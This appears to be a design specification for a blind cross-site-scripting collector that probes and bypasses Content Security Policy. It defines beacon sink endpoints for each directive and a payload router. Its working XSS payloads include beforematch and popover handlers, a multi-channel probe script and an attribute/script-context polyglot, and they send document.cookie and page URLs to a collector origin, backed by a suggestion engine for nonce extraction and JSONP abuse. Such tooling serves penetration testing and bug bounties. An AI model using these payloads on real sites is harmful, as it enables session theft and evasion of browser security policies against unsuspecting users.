Universal sink endpoints (ideally under a customizable URL prefix so the path itself cannot be blocklisted), each returning a minimal valid body for its resource type so the browser does not discard the load after the request has already reached the sink:
/beacon/img # 1x1 transparent PNG (img-src bypass)
/beacon/font # Empty WOFF2/TTF font (font-src bypass)
/beacon/css # Empty CSS stylesheet (style-src bypass)
/beacon/manifest # Empty PWA manifest (manifest-src bypass)
/beacon/script # Empty JS file (script-src bypass)
/beacon/connect # Standard fetch/XHR endpoint (connect-src)
/beacon/form # Form action target (form-action)
/beacon/media # Empty MP4/audio file (media-src)
/beacon/object # Empty plugin data (object-src)
/beacon/worker # Empty worker script (worker-src)
/beacon/frame # Minimal HTML frame (frame-src)
/beacon/jsonp # JSONP callback endpoint for CSP bypass detection
/beacon/websocket # WebSocket upgrade endpoint
/beacon/eventsource # Server-sent events endpoint
/beacon/prefetch # prefetch detection (<link rel=prefetch>; note that rel=dns-prefetch only resolves a hostname and never sends an HTTP request, so it needs a DNS-level listener rather than this endpoint)
/beacon/preload # Resource preload detection
/beacon/ping # <a ping> attribute target
/beacon/beacon # navigator.sendBeacon target
/beacon/report # CSP violation report collector (receives reports only where the policy itself names this URL in report-uri/report-to; an injected payload cannot add a reporting endpoint)
Capture and analyze all Sec-Fetch-* headers on every sink hit: Sec-Fetch-Dest names the request destination, which maps directly onto the CSP directive that governed it (image -> img-src, font -> font-src, style -> style-src, script -> script-src, and so on), so the sink can tell which directive let the request through. Two caveats: a request that CSP blocked never reaches the sink at all, so these headers only ever describe allowed requests; and browsers send Sec-Fetch-* only to HTTPS destinations, so the sink must be served over TLS or the headers are simply absent:
{
"fetch_metadata": {
"sec_fetch_site": "cross-site|same-origin|same-site|none",
"sec_fetch_mode": "cors|navigate|no-cors|same-origin|websocket",
"sec_fetch_dest": "document|script|style|image|font|media|manifest|...",
"sec_fetch_user": "?1|absent (the header is only sent on user-activated navigations)"
}
}
Automatic CSP directive inference from which sink endpoints actually received requests. This is positive evidence only: a directive is marked allowed when its destination reached the sink, but a missing hit may be a CORS, network or markup-parsing failure rather than a CSP block, so "false" should be read as "not observed" until the report endpoint or repeated probes confirm it:
{
"inferred_csp": {
"allowed_directives": {
"img_src": true,
"connect_src": false,
"script_src": "nonce_detected",
"style_src": true,
"font_src": true,
"manifest_src": true
},
"bypass_vectors": [
"img-src allows arbitrary domains",
"font-src permits data: URIs",
"manifest-src unrestricted"
],
"strict_dynamic": false,
"trusted_types": false
}
}
Expand beyond traditional cookie collection to capture 2025-relevant context:
{
"context_data": {
"csp_nonce": "extracted_nonce_if_available",
"trusted_types_policy": "detected|enforced|none",
"referrer_policy": "strict-origin-when-cross-origin",
"same_site_context": "Lax|Strict|None",
"http_only_cookies": "blocked_access_count (note: HttpOnly cookies are simply absent from document.cookie, so a script cannot count blocked reads; at best the sink can diff the cookie names it received against those observed while browsing the target)",
"framework_detection": {
"react": "18.2.0",
"vue": null,
"angular": null
}
}
}
Generate payloads based on the detected CSP configuration rather than blind spraying:
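// CSP-aware payload router
/**
 * Picks one payload builder for a target from the CSP facts inferred so far.
 *
 * Order of preference, first match wins:
 *   1. strict-dynamic with a recovered nonce  -> nonce-based script payload
 *   2. Trusted Types enforced                 -> Trusted Types-aware payload
 *   3. connect-src blocked, or not yet known  -> resource beacon to /beacon/img
 *      (img-src is the most permissive directive in practice, so it is the
 *      conservative fallback while connect-src is unconfirmed)
 *   4. otherwise                              -> standard fetch/XHR payload to /beacon/connect
 *
 * @param {{strict_dynamic?: boolean, nonce?: string, trusted_types?: boolean, connect_src?: boolean}} [cspConfig]
 *   inferred policy; a missing/null value is treated as "nothing inferred yet" instead of throwing
 * @param {string} targetEndpoint collector origin, no trailing slash
 * @returns {*} whatever the selected builder returns (the builders are defined elsewhere)
 */
function generatePayload(cspConfig, targetEndpoint) {
  const cfg = cspConfig || {};
  if (cfg.strict_dynamic && cfg.nonce) {
    return generateNonceBypass(cfg.nonce);
  }
  if (cfg.trusted_types) {
    return generateTrustedTypesPayload();
  }
  // `!connect_src` is deliberate: an undefined (unknown) value is routed like a blocked one.
  if (!cfg.connect_src) {
    return generateResourceBeacon(`${targetEndpoint}/beacon/img`);
  }
  return generateStandardPayload(`${targetEndpoint}/beacon/connect`);
}
Modern Event Handler Exploitation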
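// beforematch event for hidden-until-found exploitation.
// Caveat: `beforematch` only fires when the browser reveals the element
// (a find-in-page match or a text-fragment/anchor navigation), so this payload
// needs that user- or URL-driven trigger and stays silent on plain page load.
// The base64 blob is percent-encoded because '+' and '/' in a raw query string
// are mangled by most query parsers ('+' is decoded as a space).
const beforeMatchPayload = `
<div hidden="until-found" onbeforematch="
new Image().src='${endpoint}/beacon/img?trigger=beforematch&data=' +
encodeURIComponent(btoa(JSON.stringify({url:location.href,time:Date.now()})))
">Hidden content</div>
`;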
// Popover API exploitation.
// NOTE(review): a bare <div popover> starts hidden and `beforetoggle` only
// fires when something shows or hides it (a popovertarget button click or a
// showPopover() call), so on its own this payload needs a trigger to fire.
// navigator.sendBeacon is governed by connect-src, the same directive as
// fetch/XHR, so it does not add a new channel where connect-src is blocked.
const popoverPayload = `
<div popover onbeforetoggle="
navigator.sendBeacon('${endpoint}/beacon/connect',
JSON.stringify({trigger:'popover',context:document.title}))
">Target</div>
`;
Deploy payloads that attempt multiple exfiltration channels simultaneously:
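<!-- Multi-vector payload for comprehensive CSP probing.
     Assumes script execution has already been obtained (this is a blind-XSS
     payload). Each probe below uses a different fetch destination and so is
     governed by a different CSP directive; the sink's access log is the only
     reliable signal of which ones got through, since a client-side failure
     cannot distinguish a CSP block from a CORS or network error. -->
<script>
// Every probe must target the collector's absolute origin. A relative path
// such as '/beacon/img' resolves against the injected page's own origin,
// never reaches the sink, and only exercises 'self' in the target's policy.
const endpoint = 'https://COLLECTOR_ORIGIN'; // placeholder: the sink's origin, no trailing slash
// Primary: connect-src test
fetch(`${endpoint}/beacon/connect?test=primary`).catch(() => {});
// Fallback 1: img-src beacon
new Image().src = `${endpoint}/beacon/img?test=fallback1`;
// Fallback 2: font-src via resource preload. Fonts are always fetched in CORS
// mode, so the preload needs crossorigin to be issued as a real font request.
document.head.appendChild(Object.assign(document.createElement('link'), {
  rel: 'preload', as: 'font', crossOrigin: 'anonymous',
  href: `${endpoint}/beacon/font?test=fallback2`,
}));
// Fallback 3: style-src via an external stylesheet. An inline <style> holding
// @import is itself an inline style, which any style-src without
// 'unsafe-inline' (or a matching nonce/hash) blocks before the @import can
// fire, so it would test inline-style allowance rather than the host list.
document.head.appendChild(Object.assign(document.createElement('link'), {
  rel: 'stylesheet', href: `${endpoint}/beacon/css?test=fallback3`,
}));
</script>
Enhanced multi-context payloads: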
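// Universal polyglot: breaks out of an attribute value into an <svg onload>
// (HTML context) and, via the `<!--</script><script>` tail, out of a script
// string (script context). Every probe targets the collector's absolute origin:
// a relative '/beacon/...' path would resolve against the injected page's own
// origin, never reach the sink, and only ever exercise 'self'.
// Each sink is loaded through the element type its directive governs; loading
// all three through new Image() would make every probe an img-src test.
// Transport stays base64 (matching the other payloads) but is made UTF-8-safe,
// because btoa() throws on any character above U+00FF and cookies can contain
// them, and is then percent-encoded so '+' and '/' survive query parsing.
const universalPolyglot = `
'"><svg onload="
var u='${endpoint}';
var b=s=>encodeURIComponent(btoa(unescape(encodeURIComponent(s))));
var d='&d='+b(location.href);
new Image().src=u+'/beacon/img?ctx=svg'+d;
document.head.appendChild(Object.assign(document.createElement('link'),{rel:'preload',as:'font',crossOrigin:'anonymous',href:u+'/beacon/font?ctx=svg'+d}));
document.head.appendChild(Object.assign(document.createElement('link'),{rel:'stylesheet',href:u+'/beacon/css?ctx=svg'+d}));
" style="display:none">
<!--</script><script>
// Script context backup
var u='${endpoint}';
var b=s=>encodeURIComponent(btoa(unescape(encodeURIComponent(s))));
fetch(u+'/beacon/connect?ctx=script').catch(()=>
document.body.appendChild(Object.assign(document.createElement('img'),
{src:u+'/beacon/img?ctx=script&d='+b(document.cookie)}
))
);
//-->
`;
CSP Directive Analysis with Real-time visualization of which security policies are blocking vs. allowing requests: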
Policy Coverage Report:
├─ connect-src: BLOCKED (0/15 attempts successful)
├─ img-src: ALLOWED (15/15 attempts successful)
├─ font-src: PARTIAL (8/15 attempts successful)
├─ style-src: ALLOWED (12/15 attempts successful)
└─ script-src: NONCE_REQUIRED (0/15 inline attempts)
Recommended Payload Strategy:
→ Use img-src beacons for primary exfiltration
→ Font-src shows potential for data: URI exploitation
→ Investigate nonce extraction for script-src bypass
Automated Bypass Suggestion Engine
Based on successful request patterns, suggest optimal attack vectors:
{
"bypass_recommendations": {
"primary_vector": "img-src unrestricted",
"payload_type": "resource_beacon",
"confidence": 95,
"advanced_techniques": [
"Cache-based nonce extraction possible",
"JSONP endpoint detected on same-origin",
"File upload functionality may allow JS hosting"
]
}
}
Enhanced Notification System
{
"notification_template": {
"title": "Blind XSS Triggered - CSP Bypass Detected",
"details": {
"bypass_method": "img-src unrestricted",
"csp_confidence": "high",
"fetch_metadata": "cross-site no-cors image (an <img> beacon arrives with Sec-Fetch-Mode: no-cors and Sec-Fetch-Dest: image; 'navigate' would indicate a top-level navigation, which does not match an img-src hit)",
"recommended_exploitation": "Resource beacon chain"
}
}
}